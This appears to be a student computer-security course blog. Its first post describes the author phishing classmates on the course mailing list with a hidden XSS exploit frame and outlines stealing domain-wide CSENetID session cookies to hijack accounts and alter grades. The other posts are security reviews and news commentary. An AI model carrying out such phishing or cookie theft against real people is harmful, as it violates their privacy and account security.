UW CSE Resources

As an undergraduate student in the computer science department, there are a number of computing resources available for use. A number of these resources are through the web browser, and have private, personal information associated with them (for instance, MyCSE).

Experimental Attack

Since we were recently doing XSS attacks in our lab, I decided to experiment with them in a more real setting by sending a fake email to the cse484 mailing list, to see how many students/TAs clicked:

Hey, I’m trying to set up my web server for lab 2, but I think I’m having DNS issues with the subdomain I set up not propagating. Can anyone check this page (http://security.30tonpress.com) and see if they get an OK page?

Thanks,
David

That URL then loaded a fake DNS success page, as well as version 1 of my Yoshoo exploit in a small FRAME at the bottom of the page. Surprisingly, 19 people in the class clicked the phish link. Since class mailing lists are generally not thought of as being adversarial places, students are much more likely to click links that are posted to it — especially if there’s a halfway-decent cover story to back. This makes an adversary’s life much easier.

There are a number of reasons that someone might try to exploit XSS attacks on CSE resources. For example, malicious students that want to cause havoc and chaos for others in their class by modifying what they have turned in. Or, someone might want to gain access to all the personal information that the CSE department has on another student.

Weakness #1 – Yoshoo Lab 2

The first attack is on Lab 2 for CSE484, which involves using any captured Yoshoo authtokens to change a student’s grades back to zeroes for part 1-5. This will cause them to lose points on the lab come grading time, lowering the average score on the lab, and boosting the attacker’s score with respect to the grading curve.

An stolen authtoken can be used to log into someone’s y.um.my account, and upload new phishing URLs. These URLs could then be used to grab authtokens for part 1-5 of the grades DB. An adversary could then easily change the grades with these tokens using the same steps they did for their own project.

Weakness #2 – CSENetIDs

When accessing a protected resource on any *.cs.washington.edu, the CSENetID service is used to authenticate users in the browser. A cookie is then saved on that user’s computer under the domain: *.cs.washington.edu, with the key: csenetid_l. This puts an implicit trust on all subdomains under the cs.washington.edu domain. This means that any malicious phishing page that runs on a subdomain of cs.washington.edu that is set up to capture document.cookie from the browser will pick up the CSENetID token of any user who has recently logged in.

Once an attacker has that token, they can spoof your session. If the CSENetID auth service does any additional IP validation of the machine, the IP of the phished user can be spoofed in order to fool the web server into granting access to the attacker.

Potential Defenses

There are defenses against these attacks that can be implemented on both the server-side and the client-side.

On the server-side, any site that wants to use CSENetID authorization could explicitly talk to an authorization server within their web applications’ code (given a standard module for use with different languages like PHP, Python, etc). This could then set an authtoken cookie only on the CSE subdomain that needs authorization. However, this has two downsides. One is that every subdomain would require a user to log in again. Another is that if the module is not well-designed, some of the burden of providing a high-level of security might be shifted to each individual web application, as opposed to one central module.

On the client-side, there are a number of extensions to Firefox that can make browsing safer. One is NoScript, which only lets JavaScript, Java, and Flash execute on sites you explicitly trust. This way, you can check out a link before deciding to let it run arbitrary code. As well, Google provides a Firefox plugin based on data they have gathered about various phishing sites, that will alert a user when they are about to visit a known XSS site.

Conclusions

Even in the context of a security-focused class of students, there were still a good portion of students that clicked my phishing link. For this reason, it is extremely important for clients of web applications to install plugins that can enable them to spot phishing attacks and respond to them. As well, there is a obligation to anyone running a server-side application to sanitize any XSS vectors, and remove the amount of data that is exposed via cookies.

Posted in Ethics, Privacy, Security Reviews | 2 Comments

Large Number of Windows Security Breaches Caused by Administrative Privileges

An article linked today on Slashdot revealed that a vast majority of security breaches could be prevented if users were not logged in with administrative priveleges.  While this is not terribly surprising, the numbers were rather shocking.  The report suggests that 92% of the 154 major security breaches were caused by users having administrative priveleges.  Windows Vista’s User Accounts Control (UAC) has long been criticized for its excessive use of popup windows, and it seems that aside from being an annoyance, the measures put in place to help secure a system have become a vulnerability.

Continue reading

Posted in Current Events | Comments Off on Large Number of Windows Security Breaches Caused by Administrative Privileges

Security Review: GPeerReview

GPeerReview is a new project that attempts to create a web of trust for scientific publications. The goal is to have people read papers, leave comments, and digitally sign them with GPeerReview. The review could then be sent to an author, and if the author likes it, he/she could include it with her list of works. This would filter out false and possibly malicious reviews.  Peer review comments would hopefully give credibility to an author’s work, through many positive reviews.

The reasons for using GPeerReview are stated on their google code page. Since peer reviews give credibility to an author’s work, it is important to get peer reviews. However, reviews can possibly be damaging, in the case of false reviews. Thus, it is important to trust the reviewers, and be able to associate the reviewer  to the review, and the review to the correct publication. Through this system, a web of trust would be created, allowing for employers, journals and conferences to utilize the tool as a criteria for acceptance. Additionally, a publication can gain credibility after publication, allowing papers to be published early and reviewed later. The ultimate goal would be to revolutionize scientific publishing, similar to the world wide web and media publishing.

Continue reading

Posted in Security Reviews | Comments Off on Security Review: GPeerReview

Security Review: Google Latitude, tracking friends on Google Maps

A recent article on slashdot purports that Google will soon release new software, dubbed ‘Latitude’ enabling users to broadcast their geographic location via Google Maps.  This information can be gathered either from mobile phones, via GPS or local cell phone towers, or from laptop computers, via WIFI access points.  Once the data is uploaded, users can decide with whom to share their location, and to those lucky few their location is shown as an icon with their chosen picture on top of a Google Map display.  The initial release will support Blackberry, Android, and Windows Mobile phones, with likely updates to include iPhones and iPod touches.

Google has long had the ability to locate its users, a function predominantly featured on the iPhone.  What distinguishes ‘Latitude’, however, is the ability to take this information and share it with others.  Location data will thus have to be stored on Google’s servers, in order for others to access that information and display it on their screens.   Obviously this generates numerable privacy concerns, however Google attempts to address these by claiming the feature will be limited in that it will only display information to other people the user chooses, and that it can be easily disabled at any time.  Google also claims that the company will not collect a large database of geographic information, and the only location data stored on the servers will be the most recent location uploaded.
Continue reading

Posted in Physical Security, Privacy, Security Reviews | Tagged , , | 1 Comment

Security Review: Robot Scientist automates the discovery of new drugs!

A group of researchers working in the EU funded IQ project have put together a robot scientist that can devise a theory, come up with experiments to test the theory, carry out the physical experiments, interpret the results and then repeat the cycle. This computer system has the potential to revolutionize drug discovery which until now was either serendipitous or was the result of random experiments on thousands of chemical compounds. This technology which employs advanced artificial intelligence and data mining could pave the way for more efficient, cheap, effective and speedy methods in areas of scientific research where there is some level of automation required.

Development of medication is a sensitive topic as it is vital to medicine, the health of all people and also because it has core political and economic implications. So in order to prevent customer abuse, many governments regulate the manufacturing, sale and development of drugs. In the case of the robot scientist, a rough approach towards finding a drug has been made easy and hence it is important to analyze its security. The major components of the system involve an inductive database which stores all the raw data (chemical compound compositions and pharmacological activity), data patterns and results of experiments and the artificial intelligence software and the experiment conducting physical portion.

 

 

Assets/Security Goal:

§  A major asset and security goal of the Scientific Robot which uses data mining is to protect the integrity of its database which houses all the raw data, patterns and experiment results and prevents them from falling into the hands of adversaries.

§  Another important security goal is to make sure that the robot that handles all the fluids and compounds and performs the experiments, is in good working order. Even if everything else in the system is fine, if any of the robot’s parts are sabotaged, then the experiment results would be incorrect, misleading and of no use.

 

 

Potential Threats/Adversaries

§  A possible adversary could be a competing pharmaceuticals company that wants to take advantage of the data and results collected by the robot up till now and use the stolen information for their own research. The motive could also be just jeopardizing the company’s prospects in medicinal research by modifying the database and hence affecting future experiment results.

§  Another threat could be from a malicious third party that wants to create medical havoc and achieves that by extracting information from the database about the compounds that have an adverse effect on the human body to concoct harmful drugs.

 

 

Potential Weaknesses

§  A weakness could be introduced into the system by implementation bugs in the data mining software and the AI software. This could lead the robot to make wrong decisions as to which experiment to conduct and all the following results which infer this will be wrong as well.

§  Another weakness is having all the data stored in one database. In the light of some technical issues or power outages, there is a risk in losing all of this carefully gathered and computed data.

§  If access to the database is not authorized, this makes the system vulnerable to an attacker who gains access and manipulates its contents.

§  The physical component (the liquid mixing robot) which actually performs the experiments is also the cause for another weakness. A part loosened or worn out, a screw missing here and there could mess up the outcomes of an experiment.

 

 

Defenses

§  It is necessary to have restrictive authorized access to the database so that information does not fall into the wrong hands.

§  There should also be a backup for the database to prevent data loss in case of emergencies.

§  The physical components should be checked for maintenance issues from time to time and be monitored to some extent.

 

 

Overall, this scientific robot is going to be a great asset to medicinal research by improvising greatly the current procedures used. It is important for us to understand that this system is dealing with and storing highly complex, sophisticated data which has a close connection to the future of medicine. Everything feasible should be done to make sure that this system is used for the benefit of human kind and not otherwise.

 

http://www.sciencedaily.com/releases/2009/02/090202140042.htm

Posted in Security Reviews | Comments Off on Security Review: Robot Scientist automates the discovery of new drugs!

Current Event: Zombies Ahead

According to a story on NBC Dallas-Fort Worth, someone hacked into an electronic roadsign system designed to notify motorists of upcoming hazards.  The system was altered to read “Caution! Zombies! Ahead!!!”  It also instructed motorists to run for cold climates and warned that “the end is near.”  The story can be found here: http://www.nbcdfw.com/traffic_autos/transit/Zombies-Run-TxDOT-is-Not-Amused.html

 

Continue reading

Posted in Current Events | 4 Comments

Current Event: WarCloning Passport RFID Tags

According to Slashdot, researcher Chris Paget was able to capture many identification numbers from the new passports containing RFID tags while driving around San Francisco. Using $250 of equipment (a RFID reader and an antenna) hooked up to his laptop, Paget was able to read the identification numbers of the passport RFID tags from up to 20 feet away. According Paget, it could be possible to read the tags from hundreds of feet away since they are actual radio signals. It is then “trivial to program” a blank tag with the retrieved identification numbers. It is these numbers that are used in verifying the RFID tag. Continue reading

Posted in Current Events, Policy, Privacy, Research | Tagged , | 1 Comment

Security Review: Cryptography

Posted in Miscellaneous | Tagged | 2 Comments

Current Event: The Internet Is Unsafe

The BBC reports that a group of experts at the World Economic Forum in Davos, Switzerland met to discuss the increasing pervasiveness of organized cybercrime and cyber warfare. One expert claimed that the past year saw more malicious internet activity than the previous five years combined (the expert asked to remain anonymous in order not to be compelled to substantiate this claim).

There have been increasing findings of botnets being used by networks of professionals, including computer experts and lawyers, to steal credit card information–and in some cases channel it to other countries. Such activities serve to delegitimize the internet as a safe place for transactions, and as businesses have become increasingly integrated with the Web, this is a grave threat to their economic viability. Furthermore, as the internet has become “part of society’s central nervous system,” the health of entire economic systems may be at stake.

Perhaps even more unsettling are recent DoS attacks by Russia against the web infrastructure in Estonia and Georgia, as well as an accidental DoS against YouTube caused by state censorship in Pakistan. These attacks, which can take effect in a matter of minutes, show that the danger extends beyond the economy, as they are clearly of extreme import to national security as well.

What makes the internet so unsafe? The panelists observed that it was originally “organised around the principle of trust,” and that this has led to inherent vulnerabilities. Some panelists asked whether drastically increased measures for quarantining infected computers would be necessary; one suggested the formation of a “World Health Organization for the internet,” which would do just that by implementing a strategy against botnets similar to that employed against the more dangerous contagions.

On the other hand, some expressed concern that such measures would too severely compromise the privacy of users, in addition to requiring immense resources to implement. It would be better, they argued, to “foster the civic spirit of the web,” promoting organizations built on mutual aid and development.

I agree with the latter group that this issue cannot be resolved simply by throwing more experts and money at it (although that might not hurt). The problem has to be understood in a larger social and economic context. I don’t claim to know what would make lawyer decide that it was worth it to turn to organized cybercrime to make more money, but I think an effort to understand and remove these motivations might prove more cost-effective over time than only addressing the security aspect of the problem. Perfect security is impossible; if someone is resourceful enough, they will always be able to find vulnerabilities in the internet to exploit (if nothing else, the human element makes this true). It is definitely worth it to try to make these vulnerabilities harder to find, but this cannot be the entire solution. The causes of internet criminality must also be taken into account.

And yet, when multiple nations become involved, more drastic measures may be the only ones that remain viable. An article a little over a year ago in the Guardian reports on an organization known as the Russian Business Network (RBN)–which is suspected of being involved in approximately 60% of all internet crime–and provides evidence suggesting that the Russian government has little interest in stopping it. In this case, as the article indicates, nothing short of an international body of law and an organization to enforce it can really address this. The job of this organization should not be to contain all internet attacks, but to prevent them from being used as an instrument of coercion by one country against another. This kind of cyber warfare should be understood in the same way as a conventional attack, and dealt with accordingly. Only an international effort can accomplish this.

Posted in Current Events | 2 Comments

Wikipedia Editing Could Be Made More Restrictive Due to Vandalism

According to this article, the English version of Wikipedia may be implementing a system called “flagged revisions” to the editing software, which would require that edits would have to be approved (“flagged”) by a “trusted” user (see the Wikipedia page on flagged revisions here). Edits that have not yet been approved could be viewed by users on request, but the default version of a page would exclude any changes that have not yet been approved. Trusted users’ edits are automatically approved. There could be long wait times for edits to be approved; this system has already been implemented in the German Wikipedia version, and edits there have taken as long as three weeks to be approved. Continue reading

Posted in Availability, Current Events, Integrity | Tagged | 4 Comments